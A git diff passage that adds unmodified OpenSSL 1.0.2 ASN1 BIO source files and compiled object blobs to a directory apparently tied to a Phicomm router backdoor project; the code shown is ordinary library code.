z9$%s@6b~{ceGFFmm=O*4>T7D5ZmZfk895g_iymmNr_}SHMSCr6-_yF%_Cu|+OSivg
z<~nry2i?A{-UB~Dh2&mPon(5zhZT+wgXqH{;X_Kj%Fd^EpYBGN#$Sdfv8Ob9is5Pd
z9Qxnj$ZBv_mURRb$1mOfow;Jzw+(wnw*ygjtdIU>1zPNPi9Y(X<u~kAEL4cn$zVCk
zuwh?$W2d%5+o`>&nJi={={NPBrz%3ijE}ViS=QAOCNZRyF1WLN3|xJTEYBwPF3YJ$
zI`z>@R?rxG_SMm=#Wiw{cz#)q4hrjx;g1urWeL!2$ia+yuXI_14B1nV+S+nirlY4n
zKu)I!PX2%mLyMLRfZcGW(g5f#)=e)>V?#k9z(nct^m2XV6;iA>>}!rDC_s%q<p%=<
zs{ZIYIBf?Bxyw53Atq$29Q{f;dL9NwKb;h@rpFF~L!%{&I;>ORAKFjD8xu6_KXrSC
z9bhtC9r_KhvHHz+XfQnj+KBbx_SsgMZ4>Ab-M;mxHet5hjWQ(+&3PR=+3Q$8=XJ~s
z<;=lM&pxGxkhbRL4Ut$^cQI!bBkPqlN_@4tuE@6Pp~kopU;Bas6A}PJcsEqTXxr39
ze1uFQ#wr4HJq)C(x7$h8flyULZB1|jE~*G%&)@;j5q#)0o~KPonrNj>8jbrj8f*bL
zfoDK>@X<;`Cww{$zwb}c$ao+{W5=t3_vnH&Z5pXD=oa7Sw5f&0H5yCONRoz=G?b)4
z^x+uF0}bH=Z29)m;96Lo!aYzO_=Nh$eJL6~?$>DKXrP70MylIr!grI#T4+QQ`cUpC
z6axAfA6|0chHtb|E)1+8v;$Pc2l~-ZS@Yo5i;z7)Zk4>w{GK;H=3ZpKQp(S&Rf*xw
z&#LEz*USYOzqiYN^28keT83bE%q2frFbAvyWQi0P>kYtG!oWUr(>egWaO@o~ynP-V
zx}Mn;_E^6GwtpUe{MLBsKhE_Od7W9m0d|t(*E!Dm4Y1E(c<Gs(2fqk7=I6c-7C@~3
zV7>ywOV5pY@CSgSo{xB|uzmz=A^7K|he-E>Vl>Bz*0D)7hqC+4Vh*njVzwEZlbT^}
zZf)&Ib()=8(ny)4x3SM;oPd#3d%HPUw9IUwkS`F^9I`;r?Af!=+?DC;FKcA_`Wk!7
zlFjYgwsdYb2QvNr`5uSSF$+2heYxEZgmM)?M`wF_Q=6H~zU46R{jNeb>i~ULc7WY_
zgj;YOffEuVkCes3Bq2IT8KVt+#=8%HgZ?QwWJ)-d@L>sGEa6{CIKB%)&u<bg>zUy=
zwgbL>g8#n6zeK{H=KY6$%6isIxNO&yaM{nVC0y3?tAxw^%Xz<|-KCO08zo%UV{zOa
z*RaGd$8}P|Wj$vl{7K2~H3^sfY~b&M+s{@B$9r7l*_7~Q5<Vi~vOnKRc!R|Mw}i|5
zL39KNC)v*kf<PDs4~6Yp*t3iu;d{K7kOaTDpFVNmSzO#tzqoL5-_-N^3O(ZfAj;72
zfR*Wn*(x~m9<eH9`!kA_Jzx=~H)Cap(mgapltLai$gV0XQF`(N1KAv~<nmTlfnSN$
z?0Vq)-MOMNSjZ1%3)V1*qQdMRb5|iVkmZj4&nW`(7@GTwlmHB=j@QB2IlN+xGu9GW
z5-?<%;Ge`nOc>BY7-&a)L9v&Ro`-=rZv%uFZFSidI4^_Pl9ynGIv-bF1zFVD2ty`e
zAN`g|*cWpG4sjiqnP9zx`~RW~7jj}w!?{??tndBD__u)&{;lvd&#E}a<s-9*vk>_g
z@P1gJeYgClTt4P<&Mn^$vdEf%Q9-rNZi0iDM{EfpFY51Q8$~YgU#C;tF;s^--14Z?
eU3-AYAZJ|W^53;3c;|b`PjLU=L1hxT<^KgH=oQ`o

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_asn1.c
new file mode 100644
index 0000000..60189b3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_asn1.c
@@ -0,0 +1,482 @@
+/* bio_asn1.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * Experimental ASN1 BIO. When written through the data is converted to an
+ * ASN1 string type: default is OCTET STRING. Additional functions can be
+ * provided to add prefix and suffix data.
+ */
+
+#include <string.h>
+#include <openssl/bio.h>
+#include <openssl/asn1.h>
+
+/* Must be large enough for biggest tag+length */
+#define DEFAULT_ASN1_BUF_SIZE 20
+
+typedef enum {
+    ASN1_STATE_START,
+    ASN1_STATE_PRE_COPY,
+    ASN1_STATE_HEADER,
+    ASN1_STATE_HEADER_COPY,
+    ASN1_STATE_DATA_COPY,
+    ASN1_STATE_POST_COPY,
+    ASN1_STATE_DONE
+} asn1_bio_state_t;
+
+typedef struct BIO_ASN1_EX_FUNCS_st {
+    asn1_ps_func *ex_func;
+    asn1_ps_func *ex_free_func;
+} BIO_ASN1_EX_FUNCS;
+
+typedef struct BIO_ASN1_BUF_CTX_t {
+    /* Internal state */
+    asn1_bio_state_t state;
+    /* Internal buffer */
+    unsigned char *buf;
+    /* Size of buffer */
+    int bufsize;
+    /* Current position in buffer */
+    int bufpos;
+    /* Current buffer length */
+    int buflen;
+    /* Amount of data to copy */
+    int copylen;
+    /* Class and tag to use */
+    int asn1_class, asn1_tag;
+    asn1_ps_func *prefix, *prefix_free, *suffix, *suffix_free;
+    /* Extra buffer for prefix and suffix data */
+    unsigned char *ex_buf;
+    int ex_len;
+    int ex_pos;
+    void *ex_arg;
+} BIO_ASN1_BUF_CTX;
+
+static int asn1_bio_write(BIO *h, const char *buf, int num);
+static int asn1_bio_read(BIO *h, char *buf, int size);
+static int asn1_bio_puts(BIO *h, const char *str);
+static int asn1_bio_gets(BIO *h, char *str, int size);
+static long asn1_bio_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int asn1_bio_new(BIO *h);
+static int asn1_bio_free(BIO *data);
+static long asn1_bio_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
+
+static int asn1_bio_init(BIO_ASN1_BUF_CTX *ctx, int size);
+static int asn1_bio_flush_ex(BIO *b, BIO_ASN1_BUF_CTX *ctx,
+                             asn1_ps_func *cleanup, asn1_bio_state_t next);
+static int asn1_bio_setup_ex(BIO *b, BIO_ASN1_BUF_CTX *ctx,
+                             asn1_ps_func *setup,
+                             asn1_bio_state_t ex_state,
+                             asn1_bio_state_t other_state);
+
+static BIO_METHOD methods_asn1 = {
+    BIO_TYPE_ASN1,
+    "asn1",
+    asn1_bio_write,
+    asn1_bio_read,
+    asn1_bio_puts,
+    asn1_bio_gets,
+    asn1_bio_ctrl,
+    asn1_bio_new,
+    asn1_bio_free,
+    asn1_bio_callback_ctrl,
+};
+
+BIO_METHOD *BIO_f_asn1(void)
+{
+    return (&methods_asn1);
+}
+
+static int asn1_bio_new(BIO *b)
+{
+    BIO_ASN1_BUF_CTX *ctx;
+    ctx = OPENSSL_malloc(sizeof(BIO_ASN1_BUF_CTX));
+    if (!ctx)
+        return 0;
+    if (!asn1_bio_init(ctx, DEFAULT_ASN1_BUF_SIZE)) {
+        OPENSSL_free(ctx);
+        return 0;
+    }
+    b->init = 1;
+    b->ptr = (char *)ctx;
+    b->flags = 0;
+    return 1;
+}
+
+static int asn1_bio_init(BIO_ASN1_BUF_CTX *ctx, int size)
+{
+    ctx->buf = OPENSSL_malloc(size);
+    if (!ctx->buf)
+        return 0;
+    ctx->bufsize = size;
+    ctx->bufpos = 0;
+    ctx->buflen = 0;
+    ctx->copylen = 0;
+    ctx->asn1_class = V_ASN1_UNIVERSAL;
+    ctx->asn1_tag = V_ASN1_OCTET_STRING;
+    ctx->ex_buf = 0;
+    ctx->ex_pos = 0;
+    ctx->ex_len = 0;
+    ctx->state = ASN1_STATE_START;
+    return 1;
+}
+
+static int asn1_bio_free(BIO *b)
+{
+    BIO_ASN1_BUF_CTX *ctx;
+    ctx = (BIO_ASN1_BUF_CTX *)b->ptr;
+    if (ctx == NULL)
+        return 0;
+    if (ctx->buf)
+        OPENSSL_free(ctx->buf);
+    OPENSSL_free(ctx);
+    b->init = 0;
+    b->ptr = NULL;
+    b->flags = 0;
+    return 1;
+}
+
+static int asn1_bio_write(BIO *b, const char *in, int inl)
+{
+    BIO_ASN1_BUF_CTX *ctx;
+    int wrmax, wrlen, ret;
+    unsigned char *p;
+    if (!in || (inl < 0) || (b->next_bio == NULL))
+        return 0;
+    ctx = (BIO_ASN1_BUF_CTX *)b->ptr;
+    if (ctx == NULL)
+        return 0;
+
+    wrlen = 0;
+    ret = -1;
+
+    for (;;) {
+        switch (ctx->state) {
+
+            /* Setup prefix data, call it */
+        case ASN1_STATE_START:
+            if (!asn1_bio_setup_ex(b, ctx, ctx->prefix,
+                                   ASN1_STATE_PRE_COPY, ASN1_STATE_HEADER))
+                return 0;
+            break;
+
+            /* Copy any pre data first */
+        case ASN1_STATE_PRE_COPY:
+
+            ret = asn1_bio_flush_ex(b, ctx, ctx->prefix_free,
+                                    ASN1_STATE_HEADER);
+
+            if (ret <= 0)
+                goto done;
+
+            break;
+
+        case ASN1_STATE_HEADER:
+            ctx->buflen = ASN1_object_size(0, inl, ctx->asn1_tag) - inl;
+            OPENSSL_assert(ctx->buflen <= ctx->bufsize);
+            p = ctx->buf;
+            ASN1_put_object(&p, 0, inl, ctx->asn1_tag, ctx->asn1_class);
+            ctx->copylen = inl;
+            ctx->state = ASN1_STATE_HEADER_COPY;
+
+            break;
+
+        case ASN1_STATE_HEADER_COPY:
+            ret = BIO_write(b->next_bio, ctx->buf + ctx->bufpos, ctx->buflen);
+            if (ret <= 0)
+                goto done;
+
+            ctx->buflen -= ret;
+            if (ctx->buflen)
+                ctx->bufpos += ret;
+            else {
+                ctx->bufpos = 0;
+                ctx->state = ASN1_STATE_DATA_COPY;
+            }
+
+            break;
+
+        case ASN1_STATE_DATA_COPY:
+
+            if (inl > ctx->copylen)
+                wrmax = ctx->copylen;
+            else
+                wrmax = inl;
+            ret = BIO_write(b->next_bio, in, wrmax);
+            if (ret <= 0)
+                break;
+            wrlen += ret;
+            ctx->copylen -= ret;
+            in += ret;
+            inl -= ret;
+
+            if (ctx->copylen == 0)
+                ctx->state = ASN1_STATE_HEADER;
+
+            if (inl == 0)
+                goto done;
+
+            break;
+
+        default:
+            BIO_clear_retry_flags(b);
+            return 0;
+
+        }
+
+    }
+
+ done:
+    BIO_clear_retry_flags(b);
+    BIO_copy_next_retry(b);
+
+    return (wrlen > 0) ? wrlen : ret;
+
+}
+
+static int asn1_bio_flush_ex(BIO *b, BIO_ASN1_BUF_CTX *ctx,
+                             asn1_ps_func *cleanup, asn1_bio_state_t next)
+{
+    int ret;
+    if (ctx->ex_len <= 0)
+        return 1;
+    for (;;) {
+        ret = BIO_write(b->next_bio, ctx->ex_buf + ctx->ex_pos, ctx->ex_len);
+        if (ret <= 0)
+            break;
+        ctx->ex_len -= ret;
+        if (ctx->ex_len > 0)
+            ctx->ex_pos += ret;
+        else {
+            if (cleanup)
+                cleanup(b, &ctx->ex_buf, &ctx->ex_len, &ctx->ex_arg);
+            ctx->state = next;
+            ctx->ex_pos = 0;
+            break;
+        }
+    }
+    return ret;
+}
+
+static int asn1_bio_setup_ex(BIO *b, BIO_ASN1_BUF_CTX *ctx,
+                             asn1_ps_func *setup,
+                             asn1_bio_state_t ex_state,
+                             asn1_bio_state_t other_state)
+{
+    if (setup && !setup(b, &ctx->ex_buf, &ctx->ex_len, &ctx->ex_arg)) {
+        BIO_clear_retry_flags(b);
+        return 0;
+    }
+    if (ctx->ex_len > 0)
+        ctx->state = ex_state;
+    else
+        ctx->state = other_state;
+    return 1;
+}
+
+static int asn1_bio_read(BIO *b, char *in, int inl)
+{
+    if (!b->next_bio)
+        return 0;
+    return BIO_read(b->next_bio, in, inl);
+}
+
+static int asn1_bio_puts(BIO *b, const char *str)
+{
+    return asn1_bio_write(b, str, strlen(str));
+}
+
+static int asn1_bio_gets(BIO *b, char *str, int size)
+{
+    if (!b->next_bio)
+        return 0;
+    return BIO_gets(b->next_bio, str, size);
+}
+
+static long asn1_bio_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    if (b->next_bio == NULL)
+        return (0);
+    return BIO_callback_ctrl(b->next_bio, cmd, fp);
+}
+
+static long asn1_bio_ctrl(BIO *b, int cmd, long arg1, void *arg2)
+{
+    BIO_ASN1_BUF_CTX *ctx;
+    BIO_ASN1_EX_FUNCS *ex_func;
+    long ret = 1;
+    ctx = (BIO_ASN1_BUF_CTX *)b->ptr;
+    if (ctx == NULL)
+        return 0;
+    switch (cmd) {
+
+    case BIO_C_SET_PREFIX:
+        ex_func = arg2;
+        ctx->prefix = ex_func->ex_func;
+        ctx->prefix_free = ex_func->ex_free_func;
+        break;
+
+    case BIO_C_GET_PREFIX:
+        ex_func = arg2;
+        ex_func->ex_func = ctx->prefix;
+        ex_func->ex_free_func = ctx->prefix_free;
+        break;
+
+    case BIO_C_SET_SUFFIX:
+        ex_func = arg2;
+        ctx->suffix = ex_func->ex_func;
+        ctx->suffix_free = ex_func->ex_free_func;
+        break;
+
+    case BIO_C_GET_SUFFIX:
+        ex_func = arg2;
+        ex_func->ex_func = ctx->suffix;
+        ex_func->ex_free_func = ctx->suffix_free;
+        break;
+
+    case BIO_C_SET_EX_ARG:
+        ctx->ex_arg = arg2;
+        break;
+
+    case BIO_C_GET_EX_ARG:
+        *(void **)arg2 = ctx->ex_arg;
+        break;
+
+    case BIO_CTRL_FLUSH:
+        if (!b->next_bio)
+            return 0;
+
+        /* Call post function if possible */
+        if (ctx->state == ASN1_STATE_HEADER) {
+            if (!asn1_bio_setup_ex(b, ctx, ctx->suffix,
+                                   ASN1_STATE_POST_COPY, ASN1_STATE_DONE))
+                return 0;
+        }
+
+        if (ctx->state == ASN1_STATE_POST_COPY) {
+            ret = asn1_bio_flush_ex(b, ctx, ctx->suffix_free,
+                                    ASN1_STATE_DONE);
+            if (ret <= 0)
+                return ret;
+        }
+
+        if (ctx->state == ASN1_STATE_DONE)
+            return BIO_ctrl(b->next_bio, cmd, arg1, arg2);
+        else {
+            BIO_clear_retry_flags(b);
+            return 0;
+        }
+        break;
+
+    default:
+        if (!b->next_bio)
+            return 0;
+        return BIO_ctrl(b->next_bio, cmd, arg1, arg2);
+
+    }
+
+    return ret;
+}
+
+static int asn1_bio_set_ex(BIO *b, int cmd,
+                           asn1_ps_func *ex_func, asn1_ps_func *ex_free_func)
+{
+    BIO_ASN1_EX_FUNCS extmp;
+    extmp.ex_func = ex_func;
+    extmp.ex_free_func = ex_free_func;
+    return BIO_ctrl(b, cmd, 0, &extmp);
+}
+
+static int asn1_bio_get_ex(BIO *b, int cmd,
+                           asn1_ps_func **ex_func,
+                           asn1_ps_func **ex_free_func)
+{
+    BIO_ASN1_EX_FUNCS extmp;
+    int ret;
+    ret = BIO_ctrl(b, cmd, 0, &extmp);
+    if (ret > 0) {
+        *ex_func = extmp.ex_func;
+        *ex_free_func = extmp.ex_free_func;
+    }
+    return ret;
+}
+
+int BIO_asn1_set_prefix(BIO *b, asn1_ps_func *prefix,
+                        asn1_ps_func *prefix_free)
+{
+    return asn1_bio_set_ex(b, BIO_C_SET_PREFIX, prefix, prefix_free);
+}
+
+int BIO_asn1_get_prefix(BIO *b, asn1_ps_func **pprefix,
+                        asn1_ps_func **pprefix_free)
+{
+    return asn1_bio_get_ex(b, BIO_C_GET_PREFIX, pprefix, pprefix_free);
+}
+
+int BIO_asn1_set_suffix(BIO *b, asn1_ps_func *suffix,
+                        asn1_ps_func *suffix_free)
+{
+    return asn1_bio_set_ex(b, BIO_C_SET_SUFFIX, suffix, suffix_free);
+}
+
+int BIO_asn1_get_suffix(BIO *b, asn1_ps_func **psuffix,
+                        asn1_ps_func **psuffix_free)
+{
+    return asn1_bio_get_ex(b, BIO_C_GET_SUFFIX, psuffix, psuffix_free);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_asn1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_asn1.o
new file mode 100644
index 0000000000000000000000000000000000000000..8567f52926309ed09098eee07ed515c179449c71
GIT binary patch
literal 7200
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_ndef.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_ndef.c
new file mode 100644
index 0000000..5817a2b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_ndef.c
@@ -0,0 +1,242 @@
+/* bio_ndef.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/bio.h>
+#include <openssl/err.h>
+
+#include <stdio.h>
+
+/* Experimental NDEF ASN1 BIO support routines */
+
+/*
+ * The usage is quite simple, initialize an ASN1 structure, get a BIO from it
+ * then any data written through the BIO will end up translated to
+ * approptiate format on the fly. The data is streamed out and does *not*
+ * need to be all held in memory at once. When the BIO is flushed the output
+ * is finalized and any signatures etc written out. The BIO is a 'proper'
+ * BIO and can handle non blocking I/O correctly. The usage is simple. The
+ * implementation is *not*...
+ */
+
+/* BIO support data stored in the ASN1 BIO ex_arg */
+
+typedef struct ndef_aux_st {
+    /* ASN1 structure this BIO refers to */
+    ASN1_VALUE *val;
